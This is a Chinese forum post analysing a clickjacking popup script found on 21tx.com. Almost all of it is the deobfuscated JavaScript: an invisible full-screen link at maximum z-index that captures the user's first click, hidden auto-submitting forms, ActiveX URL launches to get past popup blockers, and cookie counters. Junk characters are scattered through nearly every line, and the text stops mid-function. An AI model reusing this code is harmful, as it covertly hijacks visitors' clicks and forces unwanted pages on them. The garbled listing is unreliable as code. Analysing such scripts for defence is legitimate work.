天星网ClickJacking点击劫持分析
& }" K; ]; K$ i7 w* c6 K2 Khttp://www.21tx.com/ 天星网
- x/ C9 p" O( `$ m$ t' j我得联系联系作者 - E" X5 j* y1 ~" z H9 u: L% B
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。. ?- N6 o0 d3 \1 R" ~3 H, U6 E
http://www.lxting.com/script/popup/v1_min.js/ z* Z4 v* _0 G1 O: S: c
+ [; u+ B( A3 Y5 O
这个是锁定到底JS脚本,
: P$ l! \ i' F# r2 ]. E( S解密后的代码- (function() { / X6 p" c, u* V) G1 j
- var aa_url = window.ytpp_url; 4 G' G H* \% i( }3 V1 P( b
- var ua = navigator.userAgent; . |% ?( @; M& C$ X! k6 X t* G
- var form_div = document.createElement('div'); * ?, U i/ h' t
- var form_pd = 0;
* S6 H& {2 Q+ T - var browser = { 8 r( d% ~: G: A+ y& ?, a( I
- ie: /msie/i.test(ua),
5 O- M4 i! Q9 D- A+ g: l - ie6: /msie 6/i.test(ua), 4 e- {7 {1 `, |5 P! V- p5 J
- ie7: /msie 7/i.test(ua), : s Q) k6 P5 ~& B5 h( H; j
- ie8: /msie 8/i.test(ua), 0 J7 N/ b. o6 g1 m, K
- ie9: /msie 9/i.test(ua),
2 t+ D4 _6 o5 x2 O - 360 : /360se/i.test(ua), * b% J* L$ g5 I# h$ r/ t) \% k# b
- sogou: /;?se.+?MetaSr/i.test(ua), ! c: z6 \* p. i- J
- maxthon: /Maxthon/i.test(ua),
, h6 D! C6 N4 o$ O7 g$ S* u - tt: /TencentTraveler/i.test(ua),
& ^, y0 O" Q- Y' v - ff: /firefox/i.test(ua),
9 |4 ^/ S8 U" T, |/ V0 _ - webkit: /AppleWebKit/i.test(ua), 3 ]% I2 A8 J% o r# E
- opera: /Opera/i.test(ua), ( ?# N! l% t* c. m+ A; `% _
- qqbrowser: /QQBrowser/i.test(ua), , L% g1 X: x" Q
- cr: /chrome/i.test(ua), , E7 V' ~ `+ D& R7 ]
- gg: window.chrome,
[* A& K* m* W- P - theworld: /Theworld/i.test(ua)
7 E* v- d5 M8 Y' b v5 u5 |1 s - }; 9 o; w" Z$ w% L0 [, P7 E
- var _setting = "";
1 A d8 ?( S4 m) T. N& f - var _ct = 0;
6 @: e2 j- [& i4 l' B - var _le = 0;
+ C/ @* U0 G# p m+ Q - var _pd = 1;
7 u$ N# W4 a$ s! }5 }# ` - var _pd2 = 0; $ H0 d8 `7 }7 n/ r% u* d
- var _pc = 1;
8 ^0 Z% o+ x# Y+ v0 n5 l0 h4 R - var _pc2 = 1;
/ C3 O: W! s+ o& D* w - var _pco = 0;
3 r; S" D$ o5 b' M1 s0 V - var _pta = 0; 5 ?% j/ `; i* B5 j. P
- var _ptb = 0; 3 D/ ~- z% J6 i1 l- p) s
- var _pt2a = 0;
# h7 K8 X, l" O: q; }3 Q- v - var _pt2b = 0;
8 V" a5 M1 D+ g8 _ - var _pt3a = 0;
; u8 G; F5 D, Z% L! B' _ - var _pt3b = 0; 6 ^. N" v4 F/ d* }4 I
- var _pt4a = 0; 9 U. ~! U# Y/ o; N. `
- var _pt4b = 0;
& | Z7 H# k& ? - var _pt5a = 0; ! g2 x* Z& O4 _# X
- var _pt5b = 0;
( n5 E `1 L, L/ Q# t - var _pt6a = 0;
0 p6 n( m) O: C2 i" G+ J) } - var _pt6b = 0;
# f1 y9 V W: n5 Z& ^" H* ^ - var _pt7a = 0;
U! f% q# G1 r) o( r. |9 I$ R; U& G - var _pt7b = 0; : \1 z, i, T( p0 f% K1 l& \
- var _pt8a = 0; . X3 ^# C) L1 Q ?# G2 G o/ W
- var _pt8b = 0; 6 I; |3 _6 u9 s. s- D. j
- var _pt9a = 0;
. f" a) y6 R% g/ K9 w - var _pt9b = 0; / `, ^( N: Q% P4 C% f, k; q
- var _pt10a = 0;
' P4 T# C2 X- u% {7 ?" w - var _pt10b = 0; ( N6 h2 n, `- K- O9 q. X; @
- var _po = 0;
, u2 G/ H% F- O; @/ a; P6 o - var _poo = 0;
8 [1 Q" w3 j) Q8 z& f1 a - var ckn, ckt;
1 [! g" A. k4 S - var ads = 0; 7 z0 Y% x5 S" B# c- O) k4 H" n
- function b(w) { ; ~) C' x& a9 m0 v
- var s = w + "="; ) Z8 x( y: e2 N* [
- var r = ""; ; N0 {4 u4 W" T8 z
- var o = 0; 1 V+ q' l" k6 x Y# u* g
- var d = 0;
& R2 f; ^7 O. b# D) O- b6 z% t - var p = document.cookie;
4 s, ?0 s4 \( D6 D. S2 w - if (document.cookie.length > 0) { % B4 a" z, {5 P* o+ r
- o = document.cookie.indexOf(s);
8 z P3 V" p% G5 c1 Z - if (o != -1) { 6 ]) I& }: q+ [" \( J0 L
- o += s.length; * x5 U* A9 \5 `' v+ g9 [% R) o
- d = document.cookie.indexOf(";", o); ) W V* J, f! e# ~9 n4 m; ~
- if (d == -1) d = document.cookie.length; 7 M G& O' ]( X2 I y& l
- r = unescape(document.cookie.substring(o, d))
1 P$ U. C: ~8 O( w - }
0 F5 f& t8 z" k4 b! ^, J - } : G& k: y$ o9 c/ H9 \1 I$ |3 O( Z/ ]
- return r
9 [- c% `- H! E% R - };
" r8 A* Q) M) `& w3 {0 _; s* { - function p(w, p, v) {
4 s0 x0 I$ z* U. E1 }8 ?' E - var t = 30; ( D, W: {9 H. x( ~9 N- O: p
- try {
% G& y* x" K) W, q) j - t = parseFloat(p) * 1
( V, ~' L0 Y& c2 p: m j) z1 N, h - } catch(e) { + J& o, m9 b8 J) Y
- t = 30 ! F; B) g* w6 z D, q# U
- } 4 v2 V" ]" V7 C6 ?4 [! I: c
- if (isNaN(t)) t = 30;
3 R. Y2 k$ P$ J7 U - var then = new Date();
. Y. k5 Q) F& x- C - then.setTime(then.getTime() + t * 60 * 1000); / M! c0 l% p0 p1 N7 F( S
- document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
# g/ B d) C2 Q" r5 e - }; t9 Q8 ?" b' u6 n$ z0 Z+ Q3 D4 S' H
- function init() { 3 a: H( L: ^2 L _) E
- _setting = ytpp_sti; / b* {) M( Q. ?/ F/ K
- if (getp(_setting, "CT")) { 3 [ {1 p% g- [& E! X& j
- _ct = getp(_setting, "CT") " f& {; U+ V; k5 O
- }
9 s( v( |7 J5 d) y - if (getp(_setting, "LE")) {
& L2 ], x5 Q5 l& e' W3 b - _le = getp(_setting, "LE") / F- e$ b8 Y9 `' \% k0 y4 j, d
- } 3 g- D& i7 n! M& O# \9 r) M
- if (getp(_setting, "PD2")) { * W# t1 d P ^* I7 L U
- _pd2 = getp(_setting, "PD2") ' d% m! Z% Z& P
- } * R: [; _( m, P7 U; o& R1 u
- if (getp(_setting, "PC2")) { 9 Y5 {4 \/ \/ T( G$ I
- _pc2 = getp(_setting, "PC2") ' x& z' P( q# T4 J. b
- } + M( Y8 W5 o0 B, M8 v% Q
- if (getp(_setting, "PCO")) { ( r, k& V+ o- M0 s
- _pco = getp(_setting, "PCO")
& Q* w* }5 j. r; R) s - }
; z2 a2 ~* a3 H3 B8 ` - for (var i = 1; i <= 10; i++) { 8 o9 o. X. _, Z3 w
- var n = i == 1 ? "": i;
5 n+ D Z; Y1 I; K% S - if (getp(_setting, "PT" + n)) { ( i, d6 b0 i0 Z2 y y
- eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); " d: ^. M5 [/ ~ f! ]! P
- eval("_pt" + n + "a = _pt" + n + "[0];"); 7 ^. z2 a) t m1 n! M
- eval("_pt" + n + "b = _pt" + n + "[1];")
4 Q0 `9 D7 g( s. C - } 5 R' H' I/ R, J$ S! |# c1 ~
- } ( G* X$ T# f% O$ U& @7 ?- V
- if (getp(_setting, "PO")) {
1 B) c& V, h' [" o: n& g& K8 W4 k - _po = getp(_setting, "PO")
; H5 u+ U% j) I& t8 W8 i - }
* ^. z/ S/ |4 B6 Z/ L; O - if (getp(_setting, "POO")) {
0 Q+ f* ~( K: A0 D" o - _poo = getp(_setting, "POO") / \9 W! W* U" d1 g T
- }
: _2 S4 p7 c- @0 P# D - if (_pco == 1 || _poo == 1) {
7 Y- U/ Z! x/ [3 Z - if (_poo == 1) {
i/ w2 |" I' I9 M+ q9 ` - _pco = 0
# O+ S a* p9 U$ Z1 g. m - } else {
/ l) I$ l7 g0 W* v- r% O - _poo = 0 - V, B6 f$ ~) _, L/ \
- } ) z! ? i7 x/ u' G* |9 l! Z( @+ e
- _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
+ ?$ p% q0 W. { - for (var i = 2; i <= 10; i++) { 3 r' }- k9 ?- h- R7 T4 M
- eval("_pt" + i + "a = _pt" + i + "b = 0;")
: H% c0 S% c: z2 v$ a0 A3 q7 W& F - }
9 H* n; [% i) |; K6 P - } 8 {6 y/ b5 i9 u2 \% v" M
- }; 8 V# F8 x& ?1 j% k( W5 m
- function getp(s, p) {
4 s3 N5 t, J/ @* J& N - var i = s.indexOf(p + ":"); - K9 j% g3 L' M+ P! ~0 S, j
- if (i >= 0) { 3 \# J2 g3 Q, |7 G
- return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
L% D3 r9 k( e0 o. ?# W - } & ~9 ~) O6 M, I6 ]# {8 s7 V
- };
* b$ ?; {/ T4 _ - function event(e, event, func, act) {
, F. T" i; n( Y r - if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
. o# g; `6 E4 B( o* m - else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
5 \4 f* x ]2 a2 b& E1 j - }
7 k* d$ o/ b9 u E2 n' c" X7 j- ] - function pop(url, param) {
% o5 z7 g5 e5 v- R8 A - if (!document.body) {
5 |( C2 F0 m7 k: t - return setTimeout(function() { " W3 s% |& F7 z1 M
- pop(url, param) # A/ l; e' u* F. U8 y0 E
- }, 7 Q! x* t: O6 z" F/ W- P. ]
- 13) $ G. r; B. h: D, l& S
- } 8 V# y/ a2 `. ~) x
- try {
0 ^6 l$ I) v& b* t - if (browser['cr'] && browser['gg']) {
2 A0 v* d& `4 C6 M+ b5 g2 p - try { ) O! f( l! w% J
- hrefopen(url) . y0 P" p N4 C" |+ ?
- } catch(e) {
$ Z1 b6 F* u- y( |% I - a_pop(url)
! @3 F% S1 N1 N" m* B4 Z: X - } / y* X( C$ g9 L$ P7 B
- } else if (browser['webkit'] && browser['maxthon']) { n$ w7 n/ a/ g% z% l$ [# q
- if (!func(url)) {
1 |. y5 Q9 a9 X; E& Y0 [) K& q - try { 3 I9 q* L6 w7 S) r
- form_pop(url); # k% Q. u& D. T" h) `
- a_pop(url)
3 z0 l9 ?/ U( y% _ - } catch(e) {}
+ Q: a7 b% M2 K - }
$ ?3 B: B$ l* a4 t# [ - } else if (browser['tt']) {
! T" O4 U2 q: K5 r# h) o" V" {$ V - try { / q* J5 ^8 o! ]* D
- object_pop(url) * ^ f0 ?- n0 C6 y( o( p
- } catch(e) {
3 W2 [3 M6 L4 p* P- ]2 N, a - a_pop(url) + N' ~$ S4 x. A6 n3 Q
- }
+ z7 a% A) @: f2 ~! X4 P$ @, W! Y) c - } else if (browser['sogou']) { * H5 J: T/ c) y4 u4 @, g6 K) [; X
- if (!func(url)) { 1 C; _ ]) e* K. o! E- N
- try {
* K5 m/ v5 a1 X1 F, x" L) m) {; S: c - a_pop(url)
8 v$ D- W3 X5 Y5 ^- X# j - } catch(e) {}
$ d$ U5 Y; v, A) G4 |0 X/ p3 t0 B- ] - } 5 I4 P' W% l3 f6 q( a
- } else if (browser['webkit'] && browser['qqbrowser']) { : R9 m- s ]7 p: s. m! j9 M
- if (!func(url)) {
2 c7 x4 z) m& `! y& b - try { ) v) q U/ h! g
- form_pop(url) 7 C _7 J7 ~4 V: ?! p
- } catch(e) {
, r0 n- B# t6 B/ e2 J g2 x7 a - click_pop(url)
7 w# @/ x9 S3 s: {5 n - } - m0 ]# p6 ?5 I8 K, [2 C6 y4 S4 k" s
- }
2 |/ z; |) W/ W7 }, ]" u - } else if (browser['webkit'] || browser['opera']) { # T+ g4 w: e g9 B" d! L
- try {
6 Y4 J3 a! J( F) F+ W; A, S - form_pop(url); ( U$ C- u# e, |6 A d
- a_pop(url) % s: E: i4 r, E* f: p5 o5 i. n
- } catch(e) {} 5 ?4 G/ Q2 `# n% Z- p; D6 A9 [
- } else if (browser['theworld'] && browser.ie6) { ; z! u" h9 z4 @ ?( j
- if (!object_pop2(url)) { # c- L3 n- _' b
- a_pop(url)
4 t& F; x$ T# |9 \ - } 6 h9 `1 }% P5 W" c
- } else if (browser['theworld'] && browser.ie8) { 0 K) T! Y) o' u1 D
- if (!func(url)) { 6 _9 |! s" O4 a" z- N m$ z; q
- try {
& v* c0 y+ f3 U4 m( P) h1 U - object_pop(url)
h r; c) J: A$ J - } catch(e) { ( r8 j' U7 b l) m! y' M7 e
- click_pop(url) ]3 e* Q. I4 H0 ]
- }
* A l( q- ~; N/ ^ - } 8 W5 y0 f: o% ]' R' {
- } else if (browser.ie6) {
0 B/ Y o0 h( ~' H$ T& D - if (!func(url)) { 5 b: p; c. x! ~; {8 Z
- object_pop2(url) " e6 S6 n5 E$ ~# q3 U+ J) c
- } 3 W) z6 m/ }0 K5 }
- } else if (browser.ie8) {
5 q) U4 j( s7 \# ^ - if (!func(url)) { / g8 R; Y$ A+ y/ @% _# @
- try { # }- z7 G3 T7 b+ M
- object_pop(url) 9 Z3 N5 Y0 R2 |& H' o8 Z
- } catch(e) { / I( s# ]% U0 h/ c
- document.onclick = function() {
" s$ j! P8 r0 ]# V3 ?6 L0 { - func(url);
( o$ q" a& y' q5 o \# H" Z - document.onclick = null
# o3 o( [! H7 f6 t# ^ - } 9 J6 Z0 B8 B3 i# k1 t$ j
- } 8 T* U+ a3 ^: ?3 L9 U8 {% a
- }
; a0 v' g- M# N" d) N - } else if (browser['ie']) { / Y* h0 n2 H6 s2 N; h
- try { / B" J$ |& Q- @2 V
- object_pop(url) / m' n" T$ l) `- W2 z
- } catch(e) { 7 [1 v9 N) ?! y5 p0 i) m O. r% U
- click_pop(url)
. f: N2 f: l+ m+ C' I, Y. \7 e6 ]0 H - }
; y, X- d0 M) {! Z+ @8 X0 i - } else if (browser['ff']) {
8 t, B. M' a# B: S - if (!func(url)) {
' G) S8 Q! n- s1 A - click_pop(url) 8 V' b7 e) Z$ w$ G2 R6 @1 r
- }
7 u# B# c7 N" {" N - } else { " Y) z8 I, l5 ?
- if (!func(url)) {
) ]3 D. z* w( n9 l) O' c - click_pop(url) 4 _3 ?' L$ P" }9 ?4 q
- }
! S! j! y. k: ]% J) u8 ^ - }
5 q0 w- N' A" D/ D8 \7 d5 W - } catch(e) {
5 S6 k1 C3 b; Q) ^ d, u; _ - if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { 8 J' B; Q( j. w3 p
- click_pop(url) 5 Q! s0 A' k. z0 S( c
- } else { ! l/ {7 j3 x: C( [* R# _9 {
- a_pop(url) , p P, n% o3 f5 p5 H
- }
# X) Y6 q, s: z, W3 F" h4 k/ O - } 8 {1 V% t$ D9 ^
- }
2 t1 p4 x# n, Z4 A* Q4 w4 S - function object_pop(url, param) { 1 K0 m) O0 v& @$ A. D+ q/ ?! \8 {
- var object = document.createElement('object');
X* Q# K" Y$ W2 f2 C5 N - object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
% {" h8 O4 e4 Y, q" h0 p6 | - object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
( K3 J2 j# u: e* d- k( L7 L' r - append(object);
; ^/ h1 O/ C) n# | v - object.launchURL(url); ) d% e9 b8 `- U2 C3 ~- {
- ads++;
( F. A) k9 ]7 j- t5 p/ c7 ~ - p(ckn, ckt, ads) 0 J8 l8 u9 o: j! z/ q$ }& o5 v( c$ A
- }
. s3 S% |" Y6 V1 _- U7 S. A - function object_pop2(url, param) { . \2 C+ ~# L# p& o, |- l
- var object2 = document.createElement('object'); ! j7 Q1 [1 ]* ~% F0 K5 x: m( f
- object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); # U( _6 x3 G2 Y' Z, F( f( _+ Y
- object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
) t, f# O7 h5 k& c" ] y5 E - append(object2); 6 L' }& Z/ k- {8 F t
- for (var i in object2) { 5 \! K2 O% D+ i- X: x
- try { (function(o) {})(object2[i])
7 u; T% I5 w8 ? _ - } catch(e) {} & }9 h2 J$ A& m/ L3 r4 r
- }
( o8 b$ ]: p3 X @+ b5 z; d4 A# Z - setTimeout(function() { : Z7 j" H& E! E* K- [- J
- object2.DOM.Script.open(url, '_blank', '')
0 E4 E" `5 z3 p - },
3 o9 d2 Q2 y6 s - 500); 0 o+ E, R' V9 c% h; k
- ads++;
& _1 x. H* t% }2 f& W. @4 [ - p(ckn, ckt, ads)
( H ]" h" S* u: C! m8 [( Q/ v1 L - } : ^: v0 V; ~2 _1 G
- function append(e) { / ^4 @ l, ~( N7 H# ^( o
- for (var t in {
9 ] j1 s1 ~9 p: I8 C2 G, b/ s - body: 1
' D& H- Q0 T/ m9 {' H3 q; ? - }) { 9 c% V( B+ J: F; d5 j% ^, b# p) I5 M4 A
- var ele = document.getElementsByTagName(t); H" R9 C3 d' |3 m6 g( I
- for (var i = 0; i < ele.length; i++) { ~% B3 ]' N7 r8 `, `, e
- ele[i].insertBefore(e, ele[i].firstChild);
7 `; I, K5 T1 p, X8 Q( ]0 M2 S - return" y8 o' m" h, ~; p5 u5 P9 D# l
- }
$ u( N" Q @7 \" M7 M- R - }
7 q( c0 y3 ~) F8 ^$ L1 B - } , Z7 F+ l* H# h" p4 p9 P
- function hrefopen(url) { : F& {; e& O( L6 l4 g: v+ k
- try { 9 C1 h) j) ~5 Q3 I) N1 e
- var c = document.createElement("a"); : j0 c& W, p7 i, O) t! Y
- c.setAttribute("href", url);
; d, M1 w) G5 W: D5 p. V - c.setAttribute("target", "_blank");
: n- r. {) k6 [* C - c.setAttribute("style", "display:none;"); 4 o e( h7 _9 v
- var b = document.createEvent("MouseEvents"); 5 F) b M8 K+ L( X
- b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
$ Z3 ?$ X4 q" }3 E - c.dispatchEvent(b);
7 N& D( X7 w6 _( m - ads++;
' C5 J+ r2 F5 W; j" X2 b3 h# D - p(ckn, ckt, ads); ! A7 z2 Z ^, e4 D! `! ?7 u& }
- return true
" p u% B6 L. u - } catch(q) { 5 a9 l6 F Q, W8 `0 G9 ~6 y
- return false
" s2 N9 x! `- X$ d- h# ` - }
4 L# y- k, ^' N1 I1 U E1 `; p2 v - }
1 N) f2 [9 z; g9 z, T5 A - function form_pop(url) {
4 b& a( y, y0 Y3 H# C1 A$ Q4 e - form_div.setAttribute('id', '__unionsky_push_d_object_box__');
3 G4 K( i6 L, Y7 @ - form_div.setAttribute('style', 'display:none');
* N5 C. T3 O7 q) m7 b - var form = document.createElement('form'); 3 [3 |# a) f+ ^3 a
- form.setAttribute('action', aa_url);
( d3 E8 E! H9 {7 y3 w! ]. m - form.setAttribute('method', 'post');
2 b) B0 ^3 ]+ J r - form.setAttribute('name', '__unionsky_push_d_form_box__');
" a2 Z6 V. c. _8 B - form.setAttribute('target', '_blank');
3 G8 ] x, f7 J5 p9 W \ - form.setAttribute('style', 'display:none'); K6 Z! Q; D5 w( c" J
- var sinput = document.createElement('input');
) `) r" _8 V, V: ^4 P2 Y$ n - sinput.setAttribute('style', 'display:none');
/ K& J. `- A: G4 T& l, U - sinput.setAttribute('type', 'submit');
) o2 t% l' z' M* n9 j& K4 V - sinput.setAttribute('id', '_sumit_2app'); # q6 q$ @1 f8 v8 r( F, F
- form.appendChild(sinput);
9 `( |7 n( _; e% T# H; X - form_div.appendChild(form);
: P/ A2 B* q5 F1 y - append(form_div);
! I a2 G/ { Q/ N3 p6 q* V" X - var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
+ U! ]0 l# L: f; c- d4 q: I - try { . G2 r* M. ? L4 ~% K% f, D% {
- document.getElementById("_sumit_2app").click() 5 B- A* I6 P) v
- } catch(e) {
}- z% `* H5 q% h2 ]" t - event(document, 'keyup',
w' W' J0 F% {- k9 j - function(e) {
9 K. ~& }% n0 c - if (document.getElementById('__unionsky_push_d_object_box__') == null) { $ q+ C+ h' o8 Z' p
- return9 T7 g, f: X' h& T* a4 r6 } M
- };
3 a) }/ c7 r6 d3 G w: ? - e = e || window.event; $ _$ @9 S1 v% |- H& S& k
- e.canceBubble = true;
9 x+ t3 }/ m2 _- E$ z; W+ ` - event(document, 'keyup', arguments.callee, true); 7 z" {; H- d( b1 A7 v
- form_pd = 1;
4 H* e D8 @0 E3 F" h - unionsky_from.submit()
; N3 }( _, [8 t. i0 F2 G& g - }) & k6 g1 N+ o# Y! z' d
- } 5 ^6 o* j% z5 F8 j0 s
- };
3 K% S* s6 B3 M# L - function click_pop(url, param) { 6 J4 i5 v0 M5 h
- event(document, 'mouseup', 5 U" P s7 Z: z; `0 [. W+ [
- function(e) { 1 p- c! M# H5 J% {- m. K. r
- e = e || window.event; % ~+ g7 ?: ]( S0 `) L& O
- e.canceBubble = true;
. e# g* I9 S% Y$ Y4 }- b! j - event(document, 'mouseup', arguments.callee, true); , \" o5 j$ A8 `
- func(url, param); ! ?1 c6 X! r! P' a+ z. v$ s# l
- ads++;
, ]/ T" C* M! H0 ~8 j' T - p(ckn, ckt, ads) ( L# q. \4 N* T ~0 g
- })
- K* t. g. d3 X' ^2 Y* Y - };
# c; ?3 Y( i4 a/ m- X4 I - function a_pop(url) {
" t' F! f; V; H8 X; k( }# q - if (ytpp_plid == 166028) { - G: h, P6 }, E* F
- return" U- U8 w5 \+ Y& n, S/ r
- } / Q/ l# ]: R1 k$ H0 K! E) M
- if (!document.body) { 3 P3 h9 ^8 J/ g! Q$ u M
- return setTimeout(function() { 3 K# }$ O6 A$ D& b }1 _
- a_pop(url)
* u, o# u k/ F0 Q @/ }5 ] - }, : z5 T4 v( _. X" y1 y1 e& e
- 13) ( k7 J' ]0 B' d: r7 h
- }
9 [+ @8 Q5 ?5 F0 b* r. ^ - var a = document.createElement("a");
- l, K' h( b' C5 M - a.href = url;
: ~: s% l" m) w: [" m7 | - a.target = "_blank"; ( m& O. X1 v$ P4 B7 j
- var div = document.createElement('div'); + M( A- i% J2 ?) p: }+ _, F
- div.style.backgroundColor = '#fff';
Y0 k' c/ ]( a! m - a.appendChild(div);
, ]3 B. X9 r" [8 ?! R; ` - append(a);
8 ?8 w/ i: b5 P2 ]4 t1 j - var as = a.style; 2 `) n I: e. z9 M0 g
- as.position = "absolute"; 3 Y- w, W8 ]% S8 L7 \) e
- as.zIndex = '2147483647'; " U* @! ~9 m* `
- as.display = "block"; + }9 I- F/ }& [0 J/ V& g
- as.top = "0px";
" }% Q' J! [- m6 A4 z* g4 ? - as.left = "0px";
" V/ l* t8 A. h - as.cursor = 'default';
2 y/ P9 z$ d: u6 ~ - as.opacity = "0"; 3 D) a/ z) B2 d
- as.filter = "alpha(opacity:0)";
) Q- g7 y1 e1 J$ M+ x7 X9 A - var m = setInterval(function() {
5 ]0 B- U, O; Y# @5 E4 B1 H/ G3 Z - if (form_pd == 1) {
0 Q* P3 z* `1 T: E - a.parentNode.removeChild(a); 7 S& j2 ~; N- R$ K; w5 D
- clearInterval(m); & q. @2 M+ u( O+ ]9 L$ b1 m
- return
" A) p! J0 b$ F' o x! Q: \/ `9 T - }
9 I" E& _' d* q3 r/ d - a.style.zIndex = '2147483647';
/ O1 Y& w; x0 a- q& O* s - var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; ' s. `& o2 W4 d
- a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
) T7 Z, ?' j0 d& |9 R# X0 T - div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
, G& }- |. J1 O8 ` - div.style.height = d.clientHeight + 'px'; _& }( Q4 a @1 _
- if (browser['ie']) {
7 r0 W9 g7 W3 N! F: m - try { , @, u+ X/ z4 g
- var divs = document.body.childNodes;
! D3 `% ~4 D1 e1 S) e2 I - for (var i = 0; i < divs.length; i++) { " o3 \" ~1 K! b8 M. n
- if (!divs[i]['style']) {
4 d/ U# O6 o5 ?' b, Y) ^! \3 A - continue
0 N$ M6 |9 _) n* C2 k" b5 k) | - } 0 x# L9 h3 Q, }: c1 w
- var _i = parseInt(divs[i].style.zIndex); 7 R# J: ]7 q% K0 ~! r- I2 A
- if (_i && divs[i] != a && _i == 2147483647) {
/ ~0 T. f1 k! {1 Q9 H4 V - divs[i].style.zIndex = _i - 1
* W3 j) c8 N) f Y E - } ( i( {9 ]6 M. [9 A% `
- } " C9 @8 z) S# {+ b& p' E0 u
- a.style.zIndex = '2147483647'# {! A9 K0 R) l- O8 [! n/ T
- } catch(e) {}
6 Z0 }3 [7 ` E6 g7 ] - } + h u2 z9 z# T8 h; P; _9 I) r
- }, ' W. C5 O2 W$ B6 [- R" w; r/ Q
- 120);
/ t- @( a, M L, J* k - a.onclick = function(e) {
5 V7 A& J4 s, h! M - if (document.getElementById('__unionsky_push_d_object_box__') != null) { ! I# d, M& g3 m* r; g- I3 ?; y N
- form_div.parentNode.removeChild(form_div) : S7 @) C9 B4 Y
- } 7 R0 R5 o, P" t8 S4 P
- e = e || window.event; ) f/ m: p+ C9 Y" q
- e.cancelBubble = true;
0 h$ p. f3 s- N - setTimeout(function() {
8 N$ O, l, C9 X" ^, q0 g - a.parentNode.removeChild(a) ' W( H+ U* j4 G
- }, 2 r) {4 s& F/ l# u! e; P
- 200); E* O6 l4 _5 o' O( {3 B
- clearInterval(m); ( U+ {9 t8 I& _# L( g8 E, F5 F
- ads++; " ]# g# C* c% c. P5 l
- p(ckn, ckt, ads) 8 o, U# Z5 b+ X2 s
- };
! ^6 n/ S, e$ v/ L: C/ L: a+ P - event(a, 'mouseup', 7 S! X# ]+ d2 `, o+ H
- function(e) { 8 t3 l/ b8 v1 u- v& b H
- e = e || window.event;
: K" O/ j3 l4 B+ x2 [ - e.cancelBubble = true
0 c) M! S' E+ A/ o$ m( A+ `1 z - })
9 o7 b4 }1 G' A: R& W) d - }
t; S9 D( a2 H/ p) l - function func(url, param) { s0 m1 J8 L8 C, a
- var f = window[String.fromCharCode(111, 112, 101, 110)]; - C" ^ ]8 b9 @+ z9 {. t
- var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); 3 Q7 m0 |- {8 b9 E& q3 n( A
- if (w) {
% ` X: c& G& R - ads++;
5 T- e" e* K- s! N; k" y1 z/ @ Z4 l0 H - p(ckn, ckt, ads) 1 ]2 C- C5 `( h4 K2 Y
- };
, U5 o/ h$ g2 p7 C/ y0 x; P - return w % M% ~$ Y$ A5 t+ Z+ }
- }
h0 H5 R4 j' x' U9 G" ^' V7 S - function fstart(url) {
' [. S y* v: W& }7 d7 h - init();
/ B$ p+ w- r1 D) O - if (_ct >= 0) { % [, @8 I" W8 T2 @8 T1 y( i2 ^
- ckn = "YITIAN_NUM";
N7 i- Y9 r4 J5 \& }9 | - ckt = _ct
9 Q3 w, Z( g$ S) ~) }. F' Y/ Y: u - } else { 0 R- S) @+ V( p9 b* V
- ckn = "YITIAN_ALL";
4 I3 H! M5 E/ j6 ]# J4 O - ckt = Math.abs(_ct) " H" x% `( }- K R
- }
* b: R+ w" c/ d; n9 e - if (ckt > 0) {
z$ B! z8 Z/ n0 S" r# I - if (b(ckn)) { % r1 h4 r" @4 }' T+ Z
- try { " o3 ^/ d {" S6 B- s
- ads = parseFloat(b(ckn)) + M3 V( l: E$ V3 ]
- } catch(q) {}
# W1 K' j8 p! w - }
4 q# B, e0 p: L& Y" p8 C2 T- j4 j - }
1 Q% Z7 b3 g& z& C0 |5 g) y: l. r - if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 7 ?& `+ o9 A/ o M- x2 Z: x' F3 p
- return$ ?+ X i! ^& ^
- } else {
, I3 b1 [4 Q l/ B+ A7 ^: o, A - if (_le > 0) { % y, j8 g' G; t n) P; Z$ r
- setTimeout(go(url), _le * 1000) 9 U/ i0 J9 n7 V% h: {
- } else { / A# V' z) w4 L* t1 F! {
- go(url)
" j3 E X+ Y1 R/ f* f% h2 F+ ^ - }
1 y/ c* y0 P: }/ b/ b6 I& F* X9 \7 V - }
& Q+ G. S( ~4 q2 v- ? - } 2 N7 ^& P9 [2 E0 b% y6 f
- function go(url) {
( X1 w( y a+ |& r: L - if (_poo == 1) {
@6 _, V$ i+ z: ` f, ]. Z - try { 0 k) F# \; H/ A g
- func(url)
7 n" A8 r6 |- C) n* o2 ^ - } catch(q) {}
4 I5 t7 Q3 R6 j: o" D3 r - } else if (_pco == 1) { 3 ?7 l& G* W9 A" |
- a_pop(url) % I! E9 d- K7 [" W/ I) D7 n
- } else { ( R6 |4 F/ h& N3 o
- if (_pd == 1) { * q* e4 p3 y0 U* ~9 L+ `
- setTimeout(function() {
s7 L" {/ P. L+ e. n/ o: i0 x6 U - pop(url, {
2 `9 ^" Q, y. h4 l' @4 A3 R; L - a: 1, & e5 T( B- {1 v, \7 A
- b: 2 " s: l" W+ [! u% U+ y
- }) : P! w# `, {2 d( [
- }, 5 `. c7 h( T* z" h
- 300) , d" q# Z4 V* [. H# R7 b/ L" ]
- } ) m0 I" {) m0 G. R. H
- if (_pd2 > Math.random()) {
2 u6 Q' k( Y& h/ S4 T - setTimeout(function() {
